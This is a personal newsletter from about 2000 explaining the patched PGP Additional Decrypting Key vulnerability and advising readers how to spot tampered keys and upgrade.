Welcome to Newsletter #6.
Sorry, I've been busy and have not been able to issue a PGP Newsletter for awhile.
Several things have happened in the world of PGP. First, a bug was discovered in all 6.x.x versions of PGP up to and including 6.5.3 (and I think at least some 5.x.x versions, but I'm not sure here). Second, NAI/PGP Inc released patches for 6.5.3 and several other versions of PGP to fix the bug. Third, NAI/PGP Inc released PGP 6.5.8, which includes a fix for the bug. And finally, NAI/PGP Inc released PGP 7.0, which includes not only the bug fix but several interesting new features. I'll have to cover the new features in the next newsletter. For now, we'll deal with the bug.
The bug is a vulnerability in the originating PGP which allows it be tricked into encrypting to an unauthorized ADK, or Additional Decrypting Key. Specifically, the bug is that PGP will accept an appended ADK outside the signed area of a public key. At the time the updated versions of PGP were released, no actual exploitation of the bug in the wild had been reported. For all practical purposes, the vulnerablity only exists for keys received from a public key server. To exploit this bug involves downloading someone's public key from a keyserver, appending an ADK decrypable by a private key you own, and uploading the key back to the server. Now, you can't modify the contents within the hash-checked area without PGP detecting the change and refusing to use the key. But the bug is that it will accept an additional key following the hash-checked area.
So, if you do not exchange keys by means of a public keyserver, you are not at high risk. But it is still possible to get a hacked public key if someone e-mails you a third party's key or passes it to you on a diskette after downloading it from a public server. Be careful about accepting any key from a third party. At the very least, after adding the key to your public keyring, you should look at the key in PGPkeys. Make sure in the options for PGPkeys you have a check by ADK in the View menu. Then, if you see a red LED icon in a key's ADK field you will know that the key encrypts to a secondary key. ADK's may be legitimate on keys for corporate email accounts; keys for home email accounts generally should not have ADK's.
I recommend all readers obtain PGP 6.5.8 or later -- either the freeware verson or one of the commercial versions (Personal Privacy or Desktop Security). The Freeware version can be downloaded at no charge from the PGP International web site.
Until next newsletter.....
-------------------- Jim Saraske --------------------
Back to
JSaraske's Home Page
This site created by PC
Possibilities (TM)
Copyright © 1999,2000 -- All rights reserved